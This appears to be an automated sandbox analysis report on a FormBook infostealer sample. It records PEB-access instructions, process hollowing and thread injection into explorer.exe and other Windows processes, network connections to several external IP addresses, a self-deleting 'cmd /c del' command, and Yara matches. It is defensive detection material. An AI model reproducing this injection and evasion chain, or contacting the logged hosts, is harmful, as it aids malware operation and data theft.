Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC8B58 mov eax, dword ptr fs:[00000030h]	5_2_02FC8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFDB40 mov eax, dword ptr fs:[00000030h]	5_2_02EFDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFF358 mov eax, dword ptr fs:[00000030h]	5_2_02EFF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB131B mov eax, dword ptr fs:[00000030h]	5_2_02FB131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]	5_2_02F1A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF58EC mov eax, dword ptr fs:[00000030h]	5_2_02EF58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF40E1 mov eax, dword ptr fs:[00000030h]	5_2_02EF40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF40E1 mov eax, dword ptr fs:[00000030h]	5_2_02EF40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF40E1 mov eax, dword ptr fs:[00000030h]	5_2_02EF40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B8E4 mov eax, dword ptr fs:[00000030h]	5_2_02F1B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B8E4 mov eax, dword ptr fs:[00000030h]	5_2_02F1B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F8B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_02F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2F0BF mov ecx, dword ptr fs:[00000030h]	5_2_02F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2F0BF mov eax, dword ptr fs:[00000030h]	5_2_02F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2F0BF mov eax, dword ptr fs:[00000030h]	5_2_02F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]	5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]	5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]	5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]	5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]	5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]	5_2_02F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F390AF mov eax, dword ptr fs:[00000030h]	5_2_02F390AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9080 mov eax, dword ptr fs:[00000030h]	5_2_02EF9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F73884 mov eax, dword ptr fs:[00000030h]	5_2_02F73884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F73884 mov eax, dword ptr fs:[00000030h]	5_2_02F73884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB2073 mov eax, dword ptr fs:[00000030h]	5_2_02FB2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC1074 mov eax, dword ptr fs:[00000030h]	5_2_02FC1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F10050 mov eax, dword ptr fs:[00000030h]	5_2_02F10050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F10050 mov eax, dword ptr fs:[00000030h]	5_2_02F10050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]	5_2_02F1A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]	5_2_02F1A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]	5_2_02F1A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]	5_2_02F1A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]	5_2_02F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]	5_2_02F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]	5_2_02F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]	5_2_02F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]	5_2_02F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]	5_2_02F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]	5_2_02F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]	5_2_02F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]	5_2_02F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F77016 mov eax, dword ptr fs:[00000030h]	5_2_02F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F77016 mov eax, dword ptr fs:[00000030h]	5_2_02F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F77016 mov eax, dword ptr fs:[00000030h]	5_2_02F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC4015 mov eax, dword ptr fs:[00000030h]	5_2_02FC4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC4015 mov eax, dword ptr fs:[00000030h]	5_2_02FC4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFB1E1 mov eax, dword ptr fs:[00000030h]	5_2_02EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFB1E1 mov eax, dword ptr fs:[00000030h]	5_2_02EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFB1E1 mov eax, dword ptr fs:[00000030h]	5_2_02EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F841E8 mov eax, dword ptr fs:[00000030h]	5_2_02F841E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]	5_2_02F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]	5_2_02F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]	5_2_02F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F751BE mov eax, dword ptr fs:[00000030h]	5_2_02F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov ecx, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F199BF mov eax, dword ptr fs:[00000030h]	5_2_02F199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F769A6 mov eax, dword ptr fs:[00000030h]	5_2_02F769A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F261A0 mov eax, dword ptr fs:[00000030h]	5_2_02F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F261A0 mov eax, dword ptr fs:[00000030h]	5_2_02F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]	5_2_02FB49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]	5_2_02FB49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]	5_2_02FB49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FB49A4 mov eax, dword ptr fs:[00000030h]	5_2_02FB49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F22990 mov eax, dword ptr fs:[00000030h]	5_2_02F22990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1C182 mov eax, dword ptr fs:[00000030h]	5_2_02F1C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2A185 mov eax, dword ptr fs:[00000030h]	5_2_02F2A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFC962 mov eax, dword ptr fs:[00000030h]	5_2_02EFC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFB171 mov eax, dword ptr fs:[00000030h]	5_2_02EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EFB171 mov eax, dword ptr fs:[00000030h]	5_2_02EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B944 mov eax, dword ptr fs:[00000030h]	5_2_02F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F1B944 mov eax, dword ptr fs:[00000030h]	5_2_02F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2513A mov eax, dword ptr fs:[00000030h]	5_2_02F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F2513A mov eax, dword ptr fs:[00000030h]	5_2_02F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]	5_2_02F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]	5_2_02F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]	5_2_02F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F14120 mov eax, dword ptr fs:[00000030h]	5_2_02F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F14120 mov ecx, dword ptr fs:[00000030h]	5_2_02F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9100 mov eax, dword ptr fs:[00000030h]	5_2_02EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9100 mov eax, dword ptr fs:[00000030h]	5_2_02EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02EF9100 mov eax, dword ptr fs:[00000030h]	5_2_02EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F216E0 mov ecx, dword ptr fs:[00000030h]	5_2_02F216E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F076E2 mov eax, dword ptr fs:[00000030h]	5_2_02F076E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FC8ED6 mov eax, dword ptr fs:[00000030h]	5_2_02FC8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F38EC7 mov eax, dword ptr fs:[00000030h]	5_2_02F38EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02FAFEC0 mov eax, dword ptr fs:[00000030h]	5_2_02FAFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_02F236CC mov eax, dword ptr fs:[00000030h]	5_2_02F236CC

Source: C:\Users\user\Desktop\NQQWym075C.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\NQQWym075C.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 192.64.147.164 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.64 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.112 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.186.238.101 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.122.148.234 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.49.23.141 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 65.254.250.119 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\NQQWym075C.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 3388	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 3388	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3388	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 100000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B80000			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\NQQWym075C.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E4A008

Jump to behavior

Source: C:\Users\user\Desktop\NQQWym075C.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'	Jump to behavior

Source: explorer.exe, 00000003.00000002.483381434.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.486272896.0000000001980000.00000002.00000001.sdmp, NQQWym075C.exe, 00000004.00000002.486311216.0000000001830000.00000002.00000001.sdmp, wlanext.exe, 00000006.00000002.490134521.0000000005D10000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\NQQWym075C.exe	Queries volume information: C:\Users\user\Desktop\NQQWym075C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Queries volume information: C:\Users\user\Desktop\NQQWym075C.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NQQWym075C.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
